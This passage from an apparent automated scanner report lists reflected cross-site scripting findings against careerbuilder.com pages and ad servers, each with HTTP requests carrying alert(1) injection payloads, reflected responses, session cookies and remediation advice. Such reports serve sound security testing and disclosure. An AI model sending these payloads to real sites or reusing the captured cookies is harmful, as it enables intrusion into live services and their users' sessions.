<input name="lr" type="hidden" value="cbcb_mhf48aa69413" a=b 317ba7aab6a" />
...[SNIP]...

2.43. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_Payroll.htm [lr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami_Payroll.htm

Issue detail

The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2848d'-alert(1)-'7bd88549adc was submitted in the lr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and makes XSS attacks difficult to prevent: HTML entity encoding does not apply inside a script block, and a single unescaped quote terminates the string literal, as the response below shows. If at all possible, the application should avoid echoing user data within this context. Where that cannot be avoided, the value must be emitted as a proper JavaScript string literal (quotes, backslashes, line terminators and the sequence </ escaped as \xHH or \uHHHH sequences), or written into an HTML-encoded attribute and read from the DOM. Since lr is also a query-string component of the generated URL, it should additionally be percent-encoded before being concatenated into that URL.

Request

GET /ag.ic/Florida_Miami_Payroll.htm?IPath=OCP&lr=cbcb_mhf48aa2848d'-alert(1)-'7bd88549adc HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 189967
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_payroll.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL32
Date: Sun, 14 Nov 2010 23:24:33 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
ntroHTML = 'The feature you requested is only available to members. Please sign in to continue...';
CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mhf48aa2848d'-alert(1)-'7bd88549adc&ff=21';
CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later.";
CB.AJAX
...[SNIP]...

2.44. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_Payroll.htm [lr parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami_Payroll.htm

Issue detail

The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a36e"%20a%3db%20771cc9e4121 was submitted in the lr parameter. This input was echoed as 9a36e" a=b 771cc9e4121 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt to identify a full proof-of-concept attack for injecting arbitrary JavaScript was not successful. The reflection point in the response below is a hidden <input>, which is not rendered and receives no mouse or focus events, so an injected event-handler attribute would not fire on its own; escalation depends on whether the application also reflects angle brackets unencoded (not established here), which would allow the tag to be closed and a new one opened. Manually examine the application's behaviour and identify any input validation or other obstacles that may be in place.

Request

GET /ag.ic/Florida_Miami_Payroll.htm?IPath=OCP&lr=cbcb_mhf48aa9a36e"%20a%3db%20771cc9e4121 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 189396
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_payroll.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL10
Date: Sun, 14 Nov 2010 23:24:08 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
<input name="lr" type="hidden" value="cbcb_mhf48aa9a36e" a=b 771cc9e4121" />
...[SNIP]...

2.45. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_Reporting.htm [lr parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami_Reporting.htm

Issue detail

The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9b54"%20a%3db%204c9a7198dfe was submitted in the lr parameter. This input was echoed as c9b54" a=b 4c9a7198dfe in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt to identify a full proof-of-concept attack for injecting arbitrary JavaScript was not successful. The reflection point in the response below is a hidden <input>, which is not rendered and receives no mouse or focus events, so an injected event-handler attribute would not fire on its own; escalation depends on whether the application also reflects angle brackets unencoded (not established here), which would allow the tag to be closed and a new one opened. Manually examine the application's behaviour and identify any input validation or other obstacles that may be in place.

Request

GET /ag.ic/Florida_Miami_Reporting.htm?IPath=OCP&lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5c9b54"%20a%3db%204c9a7198dfe&ff=21 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 196881
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_reporting.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL18
Date: Sun, 14 Nov 2010 23:24:46 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
<input name="lr" type="hidden" value="cbcb_mhf48aa'-alert(1)-'9d78db8d0a5c9b54" a=b 4c9a7198dfe" />
...[SNIP]...

2.46. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_Reporting.htm [lr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami_Reporting.htm

Issue detail

The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c58e6'-alert(1)-'45be1a04315 was submitted in the lr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and makes XSS attacks difficult to prevent: HTML entity encoding does not apply inside a script block, and a single unescaped quote terminates the string literal, as the response below shows. If at all possible, the application should avoid echoing user data within this context. Where that cannot be avoided, the value must be emitted as a proper JavaScript string literal (quotes, backslashes, line terminators and the sequence </ escaped as \xHH or \uHHHH sequences), or written into an HTML-encoded attribute and read from the DOM. Since lr is also a query-string component of the generated URL, it should additionally be percent-encoded before being concatenated into that URL.

Request

GET /ag.ic/Florida_Miami_Reporting.htm?IPath=OCP&lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5c58e6'-alert(1)-'45be1a04315&ff=21 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 197499
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_reporting.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR43
Date: Sun, 14 Nov 2010 23:25:16 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
you requested is only available to members. Please sign in to continue...';
CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5c58e6'-alert(1)-'45be1a04315&ff=21';
CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later.";
CB.AJAX
...[SNIP]...

2.47. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_TaxAccounting.htm [lr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami_TaxAccounting.htm

Issue detail

The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 351db'-alert(1)-'2f09466539d was submitted in the lr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and makes XSS attacks difficult to prevent: HTML entity encoding does not apply inside a script block, and a single unescaped quote terminates the string literal, as the response below shows. If at all possible, the application should avoid echoing user data within this context. Where that cannot be avoided, the value must be emitted as a proper JavaScript string literal (quotes, backslashes, line terminators and the sequence </ escaped as \xHH or \uHHHH sequences), or written into an HTML-encoded attribute and read from the DOM. Since lr is also a query-string component of the generated URL, it should additionally be percent-encoded before being concatenated into that URL.

Request

GET /ag.ic/Florida_Miami_TaxAccounting.htm?IPath=OCP&lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5351db'-alert(1)-'2f09466539d&ff=21 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 197530
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_taxaccounting.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR4
Date: Sun, 14 Nov 2010 23:27:35 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
you requested is only available to members. Please sign in to continue...';
CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5351db'-alert(1)-'2f09466539d&ff=21';
CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later.";
CB.AJAX
...[SNIP]...

2.48. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_TaxAccounting.htm [lr parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami_TaxAccounting.htm

Issue detail

The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21130"%20a%3db%2066d099a642a was submitted in the lr parameter. This input was echoed as 21130" a=b 66d099a642a in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt to identify a full proof-of-concept attack for injecting arbitrary JavaScript was not successful. The reflection point in the response below is a hidden <input>, which is not rendered and receives no mouse or focus events, so an injected event-handler attribute would not fire on its own; escalation depends on whether the application also reflects angle brackets unencoded (not established here), which would allow the tag to be closed and a new one opened. Manually examine the application's behaviour and identify any input validation or other obstacles that may be in place.

Request

GET /ag.ic/Florida_Miami_TaxAccounting.htm?IPath=OCP&lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a521130"%20a%3db%2066d099a642a&ff=21 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 196807
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_taxaccounting.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR25
Date: Sun, 14 Nov 2010 23:26:58 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
<input name="lr" type="hidden" value="cbcb_mhf48aa'-alert(1)-'9d78db8d0a521130" a=b 66d099a642a" />
...[SNIP]...

2.49. http://admin-clerical.careerbuilder.com/ac.ic/Florida_Miami/ [lr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://admin-clerical.careerbuilder.com
Path:   /ac.ic/Florida_Miami/

Issue detail

The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a7fe5'-alert(1)-'9425161b70b was submitted in the lr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and makes XSS attacks difficult to prevent: HTML entity encoding does not apply inside a script block, and a single unescaped quote terminates the string literal, as the response below shows. If at all possible, the application should avoid echoing user data within this context. Where that cannot be avoided, the value must be emitted as a proper JavaScript string literal (quotes, backslashes, line terminators and the sequence </ escaped as \xHH or \uHHHH sequences), or written into an HTML-encoded attribute and read from the DOM. Since lr is also a query-string component of the generated URL, it should additionally be percent-encoded before being concatenated into that URL. Note that the response below sets the CB%5FSID and BID cookies with the HttpOnly flag, which stops injected script from reading them through document.cookie but does not stop it from issuing requests in the victim's session, so the flag limits one consequence of this issue without reducing its severity.

Request

GET /ac.ic/Florida_Miami/?lr=cbcb_mha7fe5'-alert(1)-'9425161b70b&SiteID=cbcb_mh030 HTTP/1.1
Host: admin-clerical.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 198212
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=c17e999a751943249031889b774a0aec-343070737-R4-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC650B96FA49ADD94120890BA6EE7DBBB0B70BB73D4A957DF1B40E37136B4E087C94A7205966FE434239F; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:25:37 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:40:37 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL4
Date: Sun, 14 Nov 2010 22:25:37 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
in._introHTML = 'The feature you requested is only available to members. Please sign in to continue...';
CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mha7fe5'-alert(1)-'9425161b70b&ff=21';
CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later.";
CB.AJAX
...[SNIP]...

2.50. http://admin-clerical.careerbuilder.com/ac.ic/Florida_Miami/ [lr parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://admin-clerical.careerbuilder.com
Path:   /ac.ic/Florida_Miami/

Issue detail

The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f8bf"%20a%3db%2039cb7791456 was submitted in the lr parameter. This input was echoed as 5f8bf" a=b 39cb7791456 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ac.ic/Florida_Miami/?lr=cbcb_mh5f8bf"%20a%3db%2039cb7791456&SiteID=cbcb_mh030 HTTP/1.1
Host: admin-clerical.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 197140
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=f66d76a56e6c49c092e6c437b5f1f0f0-343070714-RT-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC650F8EA9F59001F10D230B0487CBA3492F4EAD435A55C0CBCAA310FAAEC46756DA0F487A1EAD80AC621; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:25:13 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:40:14 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL29
Date: Sun, 14 Nov 2010 22:25:13 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
<input name="lr" type="hidden" value="cbcb_mh5f8bf" a=b 39cb7791456" />
...[SNIP]...

2.51. http://ads.adsonar.com/adserving/getAds.jsp [pid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload e2b91<script>alert(1)</script>b3f2b434e17 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserving/getAds.jsp?placementId=20482&pid=589757e2b91<script>alert(1)</script>b3f2b434e17&ps=-1&zw=160&zh=626&url=http%3a%2f%2fwww.careerbuilder.com%2f%3flr%3dcbcb_mhf48aa'-alert(1)-'9d78db8d0a5%26ff%3d21%2fJobSeeker%2fJobs%2fJobResults.aspx%3fArgURL%3d%2fag.ic%2fFlorida_Miami%26lr%3dcbcb_mhf48aa'-alert(1)-'9d78db8d0a5%26argv0%3dFlorida_Miami%26SiteID%3dcbcb_mh031%26%26strcrit%3dQID%3dA3853799236048%3bst%3da%3buse%3dALL%3bTID%3d0%3bCTY%3dMiami%3bSID%3dFL%3bCID%3dUS%3bENR%3dNO%3bDTP%3dDRNS%3bYDI%3dYES%3bIND%3dALL%3bPDQ%3dAll%3bPDQ%3dAll%3bPAYL%3d0%3bPAYH%3dgt120%3bPOY%3dNO%3bETD%3dALL%3bRE%3dALL%3bMGT%3dDC%3bSUP%3dDC%3bFRE%3d30%3bCHL%3dag%3bQS%3dsid_unknown%3bSS%3dNO%3bTITL%3d0%3bOB%3d-modifiedint%3bRAD%3d30%3bJQT%3dRAD%3bJDV%3dFalse%3bExpHigh%3dgt50%3bExpLow%3d0%3bMaxLowExp%3d-1&v=5 HTTP/1.1
Host: ads.adsonar.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 23:25:32 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Content-Length: 2497
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=150, max=975
Connection: Keep-Alive


           <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN">
           <html>
               <head>
                   <title>Ads by Quigo</title>
                   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
</script>
                   
                   
                                           java.lang.NumberFormatException: For input string: "589757e2b91<script>alert(1)</script>b3f2b434e17"

   
                                                           </head>
...[SNIP]...

2.52. http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the placementId request parameter is copied into an HTML comment. The payload ad013--><script>alert(1)</script>679fce7bb3e was submitted in the placementId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?placementId=20482ad013--><script>alert(1)</script>679fce7bb3e&pid=589757&ps=-1&zw=160&zh=626&url=http%3a%2f%2fwww.careerbuilder.com%2f%3flr%3dcbcb_mhf48aa'-alert(1)-'9d78db8d0a5%26ff%3d21%2fJobSeeker%2fJobs%2fJobResults.aspx%3fArgURL%3d%2fag.ic%2fFlorida_Miami%26lr%3dcbcb_mhf48aa'-alert(1)-'9d78db8d0a5%26argv0%3dFlorida_Miami%26SiteID%3dcbcb_mh031%26%26strcrit%3dQID%3dA3853799236048%3bst%3da%3buse%3dALL%3bTID%3d0%3bCTY%3dMiami%3bSID%3dFL%3bCID%3dUS%3bENR%3dNO%3bDTP%3dDRNS%3bYDI%3dYES%3bIND%3dALL%3bPDQ%3dAll%3bPDQ%3dAll%3bPAYL%3d0%3bPAYH%3dgt120%3bPOY%3dNO%3bETD%3dALL%3bRE%3dALL%3bMGT%3dDC%3bSUP%3dDC%3bFRE%3d30%3bCHL%3dag%3bQS%3dsid_unknown%3bSS%3dNO%3bTITL%3d0%3bOB%3d-modifiedint%3bRAD%3d30%3bJQT%3dRAD%3bJDV%3dFalse%3bExpHigh%3dgt50%3bExpLow%3d0%3bMaxLowExp%3d-1&v=5 HTTP/1.1
Host: ads.adsonar.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 23:25:31 GMT
Content-Length: 3759
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=150, max=961
Connection: Keep-Alive
Content-Type: text/plain


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "20482ad013--><script>alert(1)</script>679fce7bb3e" -->
...[SNIP]...

2.53. http://ads.adsonar.com/adserving/getAds.jsp [ps parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the ps request parameter is copied into an HTML comment. The payload b8db5--><script>alert(1)</script>6b2d12adfe5 was submitted in the ps parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?placementId=20482&pid=589757&ps=-1b8db5--><script>alert(1)</script>6b2d12adfe5&zw=160&zh=626&url=http%3a%2f%2fwww.careerbuilder.com%2f%3flr%3dcbcb_mhf48aa'-alert(1)-'9d78db8d0a5%26ff%3d21%2fJobSeeker%2fJobs%2fJobResults.aspx%3fArgURL%3d%2fag.ic%2fFlorida_Miami%26lr%3dcbcb_mhf48aa'-alert(1)-'9d78db8d0a5%26argv0%3dFlorida_Miami%26SiteID%3dcbcb_mh031%26%26strcrit%3dQID%3dA3853799236048%3bst%3da%3buse%3dALL%3bTID%3d0%3bCTY%3dMiami%3bSID%3dFL%3bCID%3dUS%3bENR%3dNO%3bDTP%3dDRNS%3bYDI%3dYES%3bIND%3dALL%3bPDQ%3dAll%3bPDQ%3dAll%3bPAYL%3d0%3bPAYH%3dgt120%3bPOY%3dNO%3bETD%3dALL%3bRE%3dALL%3bMGT%3dDC%3bSUP%3dDC%3bFRE%3d30%3bCHL%3dag%3bQS%3dsid_unknown%3bSS%3dNO%3bTITL%3d0%3bOB%3d-modifiedint%3bRAD%3d30%3bJQT%3dRAD%3bJDV%3dFalse%3bExpHigh%3dgt50%3bExpLow%3d0%3bMaxLowExp%3d-1&v=5 HTTP/1.1
Host: ads.adsonar.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 23:25:32 GMT
Content-Length: 4202
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=150, max=959
Connection: Keep-Alive
Content-Type: text/plain


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "-1b8db5--><script>alert(1)</script>6b2d12adfe5" -->
   
...[SNIP]...

2.54. http://adserver.adtechus.com/adiframe%7C3.0%7C5310.1%7C1403936%7C0%7C225%7CADTECH [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe%7C3.0%7C5310.1%7C1403936%7C0%7C225%7CADTECH

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 999f7"><script>alert(1)</script>20cb6235d4e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C5310.1%7C1403936%7C0%7C225%7CADTECH999f7"><script>alert(1)</script>20cb6235d4e;target=_blank;kvg=528;kvi=US_FL;grp=[36993428] HTTP/1.1
